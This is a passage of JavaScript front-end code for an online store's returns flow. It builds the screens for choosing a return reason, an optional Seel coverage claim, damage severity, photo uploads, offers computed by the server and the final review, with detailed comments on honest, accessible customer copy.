function returnsHumanNote() {
  return '<p class="lc-step-note" style="margin-top:14px">' +
    t("returns.humanNote", { email: esc(CONFIG.store.supportEmail) }) + '</p>';
}

/* THE COVERAGE NOTE, on the first screen of the flow that has an order loaded.

   It renders on ANY covered order, whatever the customer is about to pick,
   because it is the last moment the 7-day deadline is still useful to them —
   and because a customer who bought protection and is never told what it does
   emails to ask. It states what the cover is and who decides a claim. It does
   NOT tell anyone their particular claim is covered, and it does not compete
   with the flow: the routing decision is made one screen later, once the reason
   is known. Nothing here is a button. */
function seelCoverageCard(order) {
  if (!hasSeel(order)) return "";
  return '<section class="lc-card lc-card--good">' +
    '<h2>' + esc(t("returns.seel.card.heading")) + '</h2>' +
    '<p>' + t("returns.seel.card.body") + '</p>' +
    '<p style="margin:0">' + t("returns.seel.deadline") + '</p>' +
  '</section>';
}

/* The states where a return is not the thing this customer needs. Each names
   what they CAN do, because a screen that only says no is a screen that
   produces an email. */
function returnsBlockedCard(ev) {
  var order = State.order;
  var body, actions = "";

  if (ev.state === "NOT_SENT") {
    /* Not a refusal — good news, and the two flows that can still help them
       are one tap away. */
    body = t("returns.blocked.notSent");
    actions =
      '<button type="button" class="lc-btn" data-goto="cancel-order">' +
        esc(t("returns.blocked.btnCancel")) + '</button>' +
      '<button type="button" class="lc-btn lc-btn--ghost" data-goto="address-change">' +
        esc(t("returns.blocked.btnAddress")) + '</button>';
  } else if (ev.state === "CANCELLED") {
    body = t("returns.blocked.cancelled", { order: esc(order.name) });
  } else if (ev.state === "IN_TRANSIT") {
    body = t("returns.blocked.inTransit");
    actions =
      '<button type="button" class="lc-btn" data-goto="order-status">' +
        esc(t("returns.blocked.btnTrack")) + '</button>';
  } else if (ev.state === "WINDOW_CLOSED") {
    /* NOT A DEAD END, and the copy must not read as one. Durability rights
       under the CRA, the ACL and the CGA are not bounded by a returns window,
       so a fault reported on day 40 is still a fault we owe a remedy on — and
       where the delivery date was estimated rather than carrier-confirmed, the
       age itself is a guess. Both route to a person. */
    body = t(ev.delivery.certain ? "returns.blocked.windowClosed"
                                 : "returns.blocked.windowClosedEstimated",
             { days: ev.daysSinceDelivery, window: RETURN_WINDOW_DAYS });
  } else {
    body = t("returns.blocked.unknown");
  }

  return backBar(t("shared.backToOptions")) +
    '<h1 data-view-title>' + esc(t("returns.heading")) + '</h1>' +
    orderSummaryCard(order, { hideItems:true }) +
    '<section class="lc-card lc-card--info"><p style="margin:0">' + body + '</p></section>' +
    (actions ? '<div class="lc-btn-row">' + actions + '</div>' : "") +
    returnsHumanNote();
}

/* --- RETURNS: what went wrong -------------------------------------------- */
VIEWS.returnsStart = {
  render: function () {
    var order = State.order;
    if (!order) return returnsLostCard();

    /* Assessed with NO reason yet, which is deliberate: the ineligible states
       above do not depend on one, and finding out an order has not shipped
       should not cost the customer a decision first. */
    var ev = evaluateReturn(order, null, null);
    if (ev.state !== "DELIVERED") return returnsBlockedCard(ev);

    var d = returnsDraft();
    var items = realItems(order);

    var reasons = RETURN_REASON_ORDER.map(function (id, i) {
      var checked = d.reason ? d.reason === id : i === 0;
      return '<label class="lc-radio-row">' +
        '<input type="radio" name="rt-reason" value="' + esc(id) + '"' +
          (checked ? " checked" : "") + '>' +
        '<span><b>' + esc(t("returns.reason." + id + ".label")) + '</b>' +
        '<small>' + esc(t("returns.reason." + id + ".hint")) + '</small></span></label>';
    }).join("");

    /* THE ITEM PICKER ONLY EXISTS WHEN THERE IS A CHOICE. A single-item order
       is the overwhelming majority here, and asking "which one?" about a list
       of one is a screen that makes the customer feel the software is not
       paying attention. Seel's protection line is already excluded by
       realItems(). */
    var itemPicker = "";
    if (items.length > 1) {
      itemPicker = '<section class="lc-card">' +
        '<h2>' + esc(t("returns.item.heading")) + '</h2>' +
        '<div class="lc-radio-list">' +
          items.map(function (li, i) {
            var checked = d.item ? d.item === li : i === 0;
            return '<label class="lc-radio-row">' +
              '<input type="radio" name="rt-item" value="' + i + '"' +
                (checked ? " checked" : "") + '>' +
              '<span><b>' + esc(itemLabel(li)) + '</b>' +
              '<small>' + esc(t("shared.quantity", { qty: li.quantity })) + '</small>' +
              '</span></label>';
          }).join("") +
        '</div></section>';
    }

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("returns.start.intro") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +

      /* THE POLICY, IN THREE LINES, BEFORE ANY QUESTION. The screen this
         replaces spent four cards explaining a process before letting anyone
         start it. What a customer needs up front is the two facts that change
         their behaviour: how long they have, and that they almost certainly
         will not have to post anything back. Everything else is answered by
         the flow itself as it goes. */
      '<section class="lc-card lc-card--info">' +
        '<h2>' + esc(t("returns.promise.heading")) + '</h2>' +
        '<p style="margin:0">' + t("returns.promise.body", { window: RETURN_WINDOW_DAYS }) + '</p>' +
      '</section>' +

      /* UNDER the promise, not above it. Our own window and "you will not have
         to post it back" are what every customer on this screen needs; the
         Seel note only applies to the ones who bought cover, and on the orders
         that do have it, it is read second because the claim it points at is
         still one decision away. Renders to "" without cover. */
      seelCoverageCard(order) +

      /* THE ITEM PICKER SITS ABOVE THE FORM, NOT BELOW IT.

         It was appended after the form's closing tag, which put "Which item?"
         underneath the Continue button — so on a two-item order the customer
         saw the question only if they scrolled past the button they had just
         been given. Every question this screen asks has to be above the
         control that submits them. */
      itemPicker +
      '<form class="lc-card" id="rt-start" novalidate>' +
        '<h2>' + esc(t("returns.start.heading")) + '</h2>' +
        '<div class="lc-radio-list">' + reasons + '</div>' +
        '<p class="lc-field-error" id="rt-start-err" role="alert" hidden></p>' +
        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn">' + esc(t("returns.btn.next")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.cancel")) + '</button>' +
        '</div>' +
      '</form>' +
      returnsHumanNote();
  },

  mount: function () {
    var form = $("#rt-start");
    if (!form) return;

    form.addEventListener("submit", function (e) {
      e.preventDefault();
      var picked = form.querySelector('input[name="rt-reason"]:checked');
      var err = $("#rt-start-err");
      var reason = picked && returnReason(picked.value);
      if (!reason) {
        if (err) { err.hidden = false; err.textContent = t("returns.start.pickOne"); }
        return;
      }

      var d = returnsDraft();
      /* CHANGING THE REASON DISCARDS THE ANSWERS THAT DEPENDED ON IT. A
         customer who picks "damaged", answers the severity question, then
         comes back and switches to "changed my mind" must not carry a severity
         into a flow that never asks for one — the Worker would ignore it, but
         the review screen would show it and the Notion row would record a
         severity nobody was asked about. Photos survive: they are already
         uploaded, they are bound to this order, and a photo of the item is
         useful under any reason. */
      if (d.reason && d.reason !== reason.id) d.severity = null;
      d.reason = reason.id;

      var items = realItems(State.order);
      if (items.length > 1) {
        var pickedItem = $('input[name="rt-item"]:checked');
        var idx = pickedItem ? Number(pickedItem.value) : 0;
        d.item = items[idx] || items[0];
      } else {
        d.item = items[0] || null;
      }

      /* Re-assessed WITH the reason, because §6 declines change-of-mind on a
         personalised item and that is only knowable now. */
      var ev = evaluateReturn(State.order, d.reason, d.severity);
      if (ev.declined) { Router.go("returnsDeclined"); return; }

      Router.go(returnsNextAfterStart(d));
    });
  }
};

/* The one place that knows the screen order, so no handler has to. */
function returnsNextAfterStart(d) {
  /* THE COVERAGE FORK, AND IT COMES FIRST.

     On a covered order with a damage or fault reason the Resolution Centre is
     the primary route, so it is offered BEFORE the customer is asked to grade
     the damage, photograph three things and write it up. Offered after all
     that, it is not an offer — it is a bill for work already done.

     It is an offer and never a redirect: the alternative is on the same screen
     and resumes this exact order of screens through returnsAfterSeel(). */
  if (seelRoutes(State.order, d.reason)) return "returnsSeel";
  return returnsAfterSeel(d);
}

/* The rest of the order, resumed — from the start screen when there is no
   cover, and from the Seel screen when the customer would rather tell us. */
function returnsAfterSeel(d) {
  var reason = returnReason(d.reason);
  if (reason && reason.severity && !d.severity) return "returnsSeverity";
  if (reason && reason.evidence) return "returnsEvidence";
  return "returnsDetail";
}

/* --- RETURNS: the refusal ------------------------------------------------- */
VIEWS.returnsDeclined = {
  render: function () {
    var order = State.order;
    if (!order || !returnsDraftValid()) return returnsLostCard();

    /* SAY WHY, AND SAY WHAT IS STILL COVERED. "We cannot accept this" on its
       own is the sentence that produces an angry email and a chargeback. The
       customer bought a hand-knitted bag with their child's name on it; the
       reason it cannot come back is obvious once stated, and everything that
       CAN still be done for them is listed underneath. */
    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.declined.heading")) + '</h1>' +
      orderSummaryCard(order, { hideItems:true }) +
      '<section class="lc-card lc-card--warn">' +
        '<h2>' + esc(t("returns.declined.whyHeading")) + '</h2>' +
        '<p style="margin:0">' + t("returns.declined.whyBody") + '</p>' +
      '</section>' +
      '<section class="lc-card lc-card--good">' +
        '<h2>' + esc(t("returns.declined.coveredHeading")) + '</h2>' +
        '<p style="margin:0">' + t("returns.declined.coveredBody") + '</p>' +
      '</section>' +
      '<div class="lc-btn-row">' +
        '<button type="button" class="lc-btn" data-goto="refund-return">' +
          esc(t("returns.declined.btnOther")) + '</button>' +
      '</div>' +
      returnsHumanNote();
  }
};

/* --- RETURNS: the covered path ------------------------------------------- */
/* ===========================================================================
   ONLY REACHABLE THROUGH THE FORK IN returnsNextAfterStart(), i.e. only on an
   order carrying a Worry-Free line, and only for a reason whose `seelFirst` is
   true on the RETURN_REASONS mirror. Without cover this screen does not exist
   and the flow is byte-for-byte what it was.

   WHAT IT MAY AND MAY NOT SAY. It may say the order carries the cover — that
   is a line item we can read. IT MAY NOT SAY THIS CLAIM WILL BE PAID: Seel
   decide that. That is why the H1 names the line item ("This order came with
   Worry-Free Purchase") and not the outcome: the heading it replaced read
   "Your parcel is covered", which is a statement about this parcel and this
   incident, asserted in the largest type on the screen and then withdrawn two
   cards later by the fault caveat. So the primary button hands over and the
   copy is careful about who does what, because "I filed a claim, where is my
   refund?" is the exact ticket this screen exists to prevent.

   AND IT IS NEVER A DEAD END. The ordinary returns process is on the same
   screen, in the same card stack, one tap away and free — a customer who does
   not want to deal with a third party must not have to.
   ===========================================================================*/
VIEWS.returnsSeel = {
  render: function () {
    if (!returnsDraftValid()) return returnsLostCard();
    var d = State.returns, order = State.order;

    /* Belt and braces. Nothing routes here without cover, but a screen that
       tells someone to claim on protection they do not have is the worst
       failure this file could produce, so it is checked at the render too. */
    if (!seelRoutes(order, d.reason)) return returnsLostCard();

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.seel.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("returns.seel.intro", { order: esc(order.name) }) + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +

      /* THE CAVEAT COMES BEFORE THE BUTTON, NOT AFTER IT. Said out loud on the
         two paths where the cover is least certain, rather than left as a trap
         under the CTA: Seel cover the parcel, so a product that was faulty out
         of the box may not be theirs to pay for, and a parcel that is merely
         late is not a parcel that is gone. The customer must not find that out
         from a claim declined a week later. Neither note changes anything
         about what we will do. */
      (d.reason === "faulty"
        ? '<p class="lc-step-note">' + t("returns.seel.faultyNote") + '</p>'
        : "") +
      (d.reason === "never-arrived"
        ? '<p class="lc-step-note">' + t("returns.seel.lostNote") + '</p>'
        : "") +

      '<section class="lc-card lc-card--good">' +
        '<h2>' + esc(t("returns.seel.whoHeading")) + '</h2>' +
        '<p>' + t("returns.seel.whoBody", { order: esc(order.name) }) + '</p>' +
        '<p>' + t("returns.seel.deadline") + '</p>' +
        '<div class="lc-btn-row">' + seelButton() + '</div>' +
      '</section>' +

      '<section class="lc-card">' +
        '<h2>' + esc(t("returns.seel.altHeading")) + '</h2>' +
        '<p>' + t("returns.seel.altBody") + '</p>' +
        '<div class="lc-btn-row">' +
          '<button type="button" class="lc-btn lc-btn--ghost" id="rt-seel-carry">' +
            esc(t("returns.seel.btnCarryOn")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.back")) + '</button>' +
        '</div>' +
      '</section>' +
      returnsHumanNote();
  },

  mount: function () {
    var btn = $("#rt-seel-carry");
    if (!btn) return;
    btn.addEventListener("click", function () {
      /* Straight back into the ordinary flow at the screen it would have been
         on. Nothing about the draft is touched — the reason and the item the
         customer already chose are still theirs. */
      Router.go(returnsAfterSeel(returnsDraft()));
    });
  }
};

/* --- RETURNS: how bad is it? --------------------------------------------- */
VIEWS.returnsSeverity = {
  render: function () {
    if (!returnsDraftValid()) return returnsLostCard();
    var d = State.returns, order = State.order;

    /* ONE QUESTION, THREE ANSWERS, NO PRICES.

       This tap is worth about $9 a claim to the business — it decides whether
       the 3PL credits the product cost back — and the customer is told none of
       that, because the moment an answer is attached to an amount you are no
       longer asking about the product, you are inviting a negotiation. They
       are asked whether they can still use the thing, which is a question they
       can answer honestly in a second. The photos are what check it. */
    var rows = RETURN_SEVERITY_ORDER.map(function (id, i) {
      var checked = d.severity ? d.severity === id : i === 0;
      return '<label class="lc-radio-row">' +
        '<input type="radio" name="rt-sev" value="' + esc(id) + '"' +
          (checked ? " checked" : "") + '>' +
        '<span><b>' + esc(t("returns.severity." + id + ".label")) + '</b>' +
        '<small>' + esc(t("returns.severity." + id + ".hint")) + '</small></span></label>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.severity.heading")) + '</h1>' +
      '<p class="lc-step-note">' +
        t("returns.severity.intro", { item: esc(d.item ? itemLabel(d.item) : t("returns.theItem")) }) +
      '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      '<form class="lc-card" id="rt-sev-form" novalidate>' +
        '<div class="lc-radio-list">' + rows + '</div>' +
        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn">' + esc(t("shared.btn.next")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.back")) + '</button>' +
        '</div>' +
      '</form>' +
      returnsHumanNote();
  },

  mount: function () {
    var form = $("#rt-sev-form");
    if (!form) return;
    form.addEventListener("submit", function (e) {
      e.preventDefault();
      var picked = form.querySelector('input[name="rt-sev"]:checked');
      var sev = picked && returnSeverity(picked.value);
      if (!sev) return;
      var d = returnsDraft();
      d.severity = sev.id;
      var reason = returnReason(d.reason);
      Router.go(reason && reason.evidence ? "returnsEvidence" : "returnsDetail");
    });
  }
};

/* --- RETURNS: photos ------------------------------------------------------ */
VIEWS.returnsEvidence = {
  render: function () {
    if (!returnsDraftValid()) return returnsLostCard();
    var d = State.returns, order = State.order;

    /* NO TICKET, NO UPLOADS. A Worker that predates this build, or a lookup
       that happened more than an hour ago, leaves us with nothing to sign an
       upload with. Say so plainly and route to a person rather than letting
       the customer photograph three things into a failure. */
    if (!State.evidenceTicket) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("returns.evidence.heading")) + '</h1>' +
        '<section class="lc-card lc-card--warn"><p style="margin:0">' +
          t("returns.evidence.unavailable", { email: esc(CONFIG.store.supportEmail) }) +
        '</p></section>';
    }

    var slots = EVIDENCE_SHOTS.map(function (shot) {
      var got = returnsShot(d, shot.id);
      return '<div class="lc-shot" data-shot="' + esc(shot.id) + '"' +
          (got ? ' data-done="1"' : "") + '>' +
        '<div class="lc-shot__h">' +
          '<b>' + esc(t("returns.shot." + shot.id + ".label")) + '</b>' +
          (shot.required ? '<span class="lc-chip lc-chip--alert">' +
              esc(t("returns.shot.required")) + '</span>'
            : '<span class="lc-chip lc-chip--quiet">' +
              esc(t("returns.shot.optional")) + '</span>') +
        '</div>' +
        '<p class="lc-shot__hint">' + esc(t("returns.shot." + shot.id + ".hint")) + '</p>' +
        '<div class="lc-shot__state" id="rt-state-' + esc(shot.id) + '" aria-live="polite">' +
          (got ? esc(t("returns.shot.done")) : "") + '</div>' +
        /* `capture` is deliberately NOT set. It forces the camera on some
           Android builds and blocks the gallery, and a good half of these
           photos were taken twenty minutes ago when the parcel was opened. */
        '<label class="lc-btn lc-btn--ghost lc-shot__btn">' +
          '<input type="file" accept="image/*,video/*" ' +
            'data-shot-input="' + esc(shot.id) + '" hidden>' +
          esc(t(got ? "returns.shot.replace" : "returns.shot.add")) +
        '</label>' +
      '</div>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.evidence.heading")) + '</h1>' +
      /* WHY WE ARE ASKING, IN ONE SENTENCE. People hand over photographs of
         the inside of their homes much more readily when told what the photos
         are for, and "it is what lets us sort this out without posting
         anything back" is both true and the thing they want. */
      '<p class="lc-step-note">' + t("returns.evidence.intro") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      '<section class="lc-card">' + slots + '</section>' +
      '<p class="lc-field-error" id="rt-ev-err" role="alert" tabindex="-1" hidden></p>' +
      '<div class="lc-btn-row">' +
        '<button type="button" class="lc-btn" id="rt-ev-next">' +
          esc(t("shared.btn.next")) + '</button>' +
        '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
          esc(t("shared.btn.back")) + '</button>' +
      '</div>' +
      '<p class="lc-step-note" style="margin-top:12px">' +
        t("returns.evidence.privacy", { months: 12 }) + '</p>' +
      returnsHumanNote();
  },

  mount: function () {
    var d = State.returns;
    if (!d) return;
    var err = $("#rt-ev-err");
    var uploading = 0;

    /* One handler per slot. A file input is replaced wholesale on every render,
       so nothing here needs to survive a re-render — Router.clearTimers()
       tears the view down between screens. */
    EVIDENCE_SHOTS.forEach(function (shot) {
      var input = document.querySelector('[data-shot-input="' + shot.id + '"]');
      if (!input) return;

      input.addEventListener("change", function () {
        var file = input.files && input.files[0];
        if (!file) return;
        var box = document.querySelector('.lc-shot[data-shot="' + shot.id + '"]');
        var state = $("#rt-state-" + shot.id);
        if (err) { err.hidden = true; err.textContent = ""; }

        /* CHECKED BEFORE THE UPLOAD, not after. A parent on a rural connection
           should not spend four minutes sending a 40MB 4K clip to be told no
           by the Worker — which would also be the honest answer, just an
           expensive one. */
        if (file.size > EVIDENCE_MAX_BYTES) {
          if (state) state.textContent = t("returns.shot.tooLarge");
          if (box) box.removeAttribute("data-done");
          input.value = "";
          return;
        }

        uploading++;
        if (box) box.setAttribute("data-busy", "1");
        if (state) state.textContent = t("returns.shot.uploading");
        say(t("returns.shot.sayUploading"));

        uploadEvidence(file, shot.id).then(function (res) {
          uploading--;
          if (box) box.removeAttribute("data-busy");
          /* The customer may have moved on, or switched orders, while a photo
             was in flight. Nothing is written to a draft that no longer
             belongs to the order this upload was signed for. */
          if (!State.returns || State.returns !== d || !State.order) return;

          if (!res.ok) {
            if (state) state.textContent = t("returns.shot.failed." + (
              res.reason === "too_large" ? "tooLarge" :
              res.reason === "not_media" ? "notMedia" :
              res.reason === "too_many_files" ? "tooMany" : "network"));
            if (box) box.removeAttribute("data-done");
            input.value = "";
            return;
          }

          /* REPLACE, never append, for the same shot. Somebody who takes three
             goes at photographing a cut in a bag should end with one photo of
             it, not three — the packing team reads the message on a phone. */
          d.evidence = d.evidence.filter(function (e) { return e.shot !== shot.id; });
          d.evidence.push({ key: res.key, shot: shot.id, kind: res.kind,
                            label: t("returns.shot." + shot.id + ".label") });

          if (state) state.textContent = t("returns.shot.done");
          if (box) box.setAttribute("data-done", "1");
          var btn = box && box.querySelector(".lc-shot__btn");
          if (btn) {
            /* textContent would eat the hidden <input>. Only the trailing text
               node is the label. */
            var last = btn.lastChild;
            if (last && last.nodeType === 3) last.nodeValue = t("returns.shot.replace");
          }
          say(t("returns.shot.sayDone", { shot: t("returns.shot." + shot.id + ".label") }));
          /* The file is released here: nothing holds a File object once the
             handle exists, so five photos do not sit in the tab as 50MB. */
          input.value = "";
        });
      });
    });

    var next = $("#rt-ev-next");
    if (!next) return;
    next.addEventListener("click", function () {
      if (uploading > 0) {
        if (err) { err.hidden = false; err.textContent = t("returns.evidence.stillUploading"); err.focus(); }
        return;
      }
      var missing = EVIDENCE_SHOTS.filter(function (s) {
        return s.required && !returnsShot(d, s.id);
      });
      if (missing.length) {
        /* NAMES THE SHOT THAT IS MISSING. "Please add the required photos" is
           the message that makes somebody scroll up and down twice. */
        if (err) {
          err.hidden = false;
          err.textContent = t("returns.evidence.missing", {
            /* JOINED ON " · ", NOT ", ". The shot labels contain commas of
               their own — "The problem, close up" — so a comma-separated list
               of them reads as twice as many items as it names. */
            shots: missing.map(function (s) { return t("returns.shot." + s.id + ".label"); }).join(" · ")
          });
          err.focus();
        }
        return;
      }
      Router.go("returnsDetail");
    });
  }
};

function returnsShot(d, id) {
  if (!d || !d.evidence) return null;
  for (var i = 0; i < d.evidence.length; i++) {
    if (d.evidence[i].shot === id) return d.evidence[i];
  }
  return null;
}

/* --- RETURNS: what happened ---------------------------------------------- */
VIEWS.returnsDetail = {
  render: function () {
    if (!returnsDraftValid()) return returnsLostCard();
    var d = State.returns, order = State.order;

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.detail.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("returns.detail.intro") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      '<form class="lc-card" id="rt-detail" novalidate>' +
        '<div class="lc-field">' +
          '<label for="rt-text">' + esc(t("returns.detail.label")) + '</label>' +
          '<p class="lc-hint" id="rt-text-hint">' +
            esc(t("returns.detail.hint." + d.reason)) + '</p>' +
          '<textarea id="rt-text" rows="4" maxlength="300" ' +
            'aria-describedby="rt-text-hint rt-text-count">' + esc(d.detail || "") + '</textarea>' +
          '<p class="lc-spell-count" id="rt-text-count" aria-live="polite"></p>' +
        '</div>' +
        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn">' + esc(t("shared.btn.next")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.back")) + '</button>' +
        '</div>' +
      '</form>' +
      returnsHumanNote();
  },

  mount: function () {
    var form = $("#rt-detail"), input = $("#rt-text"), count = $("#rt-text-count");
    if (!form || !input) return;

    var paint = function () {
      if (count) count.textContent = t("returns.detail.count", {
        used: input.value.length, max: 300
      });
    };
    input.addEventListener("input", paint);
    paint();

    form.addEventListener("submit", function (e) {
      e.preventDefault();
      /* NOT REQUIRED. A photo of a snapped pole says more than a paragraph,
         and demanding prose from somebody who has already shown us the problem
         is how a finished form gets abandoned two taps from the end. */
      returnsDraft().detail = input.value;
      Router.go("returnsReview");
    });
  }
};

/* Shared by the review screen and the internal preview, so the summary the
   customer reads and the message the packing team gets are built from one
   description of the claim. */
function returnsSummaryRows(d, ev) {
  var rows = [
    { k: t("returns.review.rowReason"), v: t("returns.reason." + d.reason + ".label") }
  ];
  if (d.item) rows.push({ k: t("returns.review.rowItem"), v: itemLabel(d.item) });
  if (d.severity) {
    rows.push({ k: t("returns.review.rowSeverity"),
                v: t("returns.severity." + d.severity + ".label") });
  }
  if (returnReason(d.reason) && returnReason(d.reason).evidence) {
    rows.push({ k: t("returns.review.rowPhotos"),
                /* " · " for the same reason as the missing-shots list: these
                   labels contain their own commas. */
                v: d.evidence.length
                     ? d.evidence.map(function (e) { return e.label; }).join(" · ")
                     : t("returns.review.noPhotos") });
  }
  if (d.detail) rows.push({ k: t("returns.review.rowDetail"), v: d.detail });
  /* Stated because it is the fact the customer is most likely to be wrong
     about, and the one an argument on day 31 turns on. */
  if (ev.daysSinceDelivery !== null) {
    rows.push({ k: t("returns.review.rowDelivered"),
                v: t(ev.delivery.certain ? "returns.review.deliveredCertain"
                                         : "returns.review.deliveredEstimated",
                     { days: ev.daysSinceDelivery }) });
  }
  return rows;
}

/* --- RETURNS: check and send --------------------------------------------- */
/* ===========================================================================
   THE SAVE-THE-SALE SCREEN

   Reached only when the Worker sends an offer set back with the submission.
   When it does not — a declined claim, a customer §8 held for review, an
   outage — the plain confirmation shows instead and nothing here runs.

   THE OFFER SET IS RENDERED, NOT DECIDED. Every price on this screen was
   computed by the Worker and comes down the wire; the client does not know the
   landed cost, the caps, the kill switch or the customer's claim history, and
   a client that guessed at any of them would eventually promise something the
   Worker then refuses.
   =========================================================================== */
VIEWS.returnsOffers = {
  render: function () {
    var r = State.result || {}, order = State.order || {};
    var offers = r.offers || [];
    if (!offers.length) return "";

    var cards = offers.map(function (o, i) {
      var amount = o.amount ? ((r.currency ? r.currency + " " : "") + o.amount) : "";
      /* The recommended one leads and is visually louder. That is the entire
         mechanism: the cheapest resolution for us is also the fastest for
         them, so the honest presentation and the profitable one agree. */
      return '<section class="lc-card' + (o.recommended ? ' lc-card--info' : '') + '">' +
          (o.recommended
            ? '<p class="lc-step-note" style="margin-top:0">' + esc(t("returns.offers.recommended")) + '</p>'
            : '') +
          '<h2>' + esc(o.label || "") + '</h2>' +
          (amount
            ? '<p style="font-size:1.5rem;font-weight:600;margin:.25rem 0">' + esc(amount) +
              /* THE WORKER SAYS WHICH OFFERS ARE INSTANT, not the kind. Store
                 credit only completes without a person while the executor is
                 switched on; badging it instant when it is off promises
                 something the very next click cannot deliver. */
              (o.instant
                ? ' <span style="font-size:.9rem;font-weight:400;opacity:.75">' +
                  esc(t("returns.offers.instant")) + '</span>'
                : '') +
              '</p>'
            : '') +
          '<button type="button" class="lc-btn' + (o.recommended ? ' lc-btn--primary' : '') + '"' +
            ' data-offer="' + esc(o.id) + '">' + esc(t("returns.offers.choose")) + '</button>' +
        '</section>';
    }).join("");

    return '<h1 data-view-title>' + esc(t("returns.offers.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("returns.offers.intro", { order: esc(order.name || "") }) + '</p>' +
      '<div data-offer-error hidden></div>' +
      cards +
      /* DOING NOTHING IS A REAL OPTION AND IS SAID OUT LOUD. A screen that
         looks like it demands a choice, on a claim that is already safely
         logged, reads as pressure at exactly the wrong moment. */
      '<section class="lc-card">' +
        '<h2>' + esc(t("returns.offers.skipHeading")) + '</h2>' +
        '<p style="margin:0">' + t("returns.offers.skipBody", { email: esc(order.email || "") }) + '</p>' +
      '</section>';
  },

  mount: function (root) {
    var order = State.order || {};
    var busy = false;

    root.addEventListener("click", function (e) {
      var btn = e.target.closest ? e.target.closest("[data-offer]") : null;
      if (!btn || busy) return;

      /* ONE PRESS. A second press while the first is in flight is the classic
         way to ask for two credits; the Worker refuses the duplicate anyway,
         but letting it happen and then explaining it is worse than not
         letting it happen. */
      busy = true;
      var all = root.querySelectorAll("[data-offer]");
      for (var i = 0; i < all.length; i++) all[i].disabled = true;
      btn.textContent = t("returns.offers.working");

      chooseResolution(btn.getAttribute("data-offer")).then(function (res) {
        if (res && res.ok && res.moved) {
          State.result.heading = t("returns.chosen.credit.heading");
          State.result.blurb = t("returns.chosen.credit.blurb", {
            amount: (res.currency ? res.currency + " " : "") + res.amount,
            order: order.name, email: order.email
          });
          return Router.go("success", { replace:true });
        }
        if (res && res.ok) {
          /* Chosen but not executed — either it needs a person by nature, or
             the Worker declined to move money. The customer is told the same
             thing either way, because the difference is ours to deal with. */
          State.result.heading = t("returns.chosen.other.heading");
          State.result.blurb = t("returns.chosen.other.blurb", {
            order: order.name, email: order.email
          });
          return Router.go("success", { replace:true });
        }

        /* A network failure. The claim IS already logged, so the honest thing
           is to say so and let them leave — not to imply the whole thing was
           lost and invite a second submission. */
        busy = false;
        for (var j = 0; j < all.length; j++) all[j].disabled = false;
        btn.textContent = t("returns.offers.choose");
        var box = root.querySelector("[data-offer-error]");
        if (box) {
          box.hidden = false;
          box.className = "lc-card lc-card--warn";
          box.innerHTML = '<h2>' + esc(t("returns.offers.failHeading")) + '</h2>' +
            '<p style="margin:0">' + t("returns.offers.failBody", { email: esc(order.email || "") }) + '</p>';
        }
      });
    });
  }
};

VIEWS.returnsReview = {
  render: function () {
    if (!returnsDraftValid()) return returnsLostCard();
    var d = State.returns, order = State.order;
    var ev = evaluateReturn(order, d.reason, d.severity);

    /* THE SERVER WILL RE-CHECK ALL OF THIS. Re-running it here catches the
       case where the customer sat on this screen while the order changed under
       them, and it costs one function call. */
    if (ev.declined) return returnsBlockedCard(ev);
    if (!ev.returnable) return returnsBlockedCard(ev);

    var rows = returnsSummaryRows(d, ev).map(function (r) {
      return '<dt>' + esc(r.k) + '</dt><dd>' + esc(r.v) + '</dd>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("returns.review.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("returns.review.intro") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +

      '<section class="lc-card">' +
        '<h2>' + esc(t("returns.review.whatHeading")) + '</h2>' +
        '<dl class="lc-kv">' + rows + '</dl>' +
      '</section>' +

      /* WHAT HAPPENS NEXT, AND DELIBERATELY NO NUMBERS.

         Nothing has been approved at this point. Naming an amount, or even a
         likely outcome, would be a promise made by a form — and the one thing
         worse than a slow answer is a fast wrong one that has to be walked
         back. The honest version is short: we have it, a person looks at it,
         you hear back by email. */
      '<section class="lc-card lc-card--info">' +
        '<h2>' + esc(t("returns.review.nextHeading")) + '</h2>' +
        '<p>' + t("returns.review.nextBody", { email: esc(order.email) }) + '</p>' +
        '<p style="margin:0">' +
          t(ev.notifyThreePL ? "returns.review.next3pl" : "returns.review.nextUs",
            { threePL: esc(CONFIG.fulfillment.threePL) }) + '</p>' +
      '</section>' +

      '<section class="lc-card">' +
        '<label class="lc-check" for="rt-confirm">' +
          '<input type="checkbox" id="rt-confirm">' +
          '<span>' + esc(t("returns.review.confirmLabel")) + '</span>' +
        '</label>' +
        '<div class="lc-btn-row">' +
          /* aria-disabled rather than the attribute, as everywhere else here: a
             truly disabled button leaves the tab order, so a keyboard user tabs
             from the checkbox straight past the primary action. */
          '<button type="button" class="lc-btn" id="rt-send" aria-disabled="true" ' +
            'aria-describedby="rt-send-hint">' + esc(t("returns.review.send")) + '</button>' +
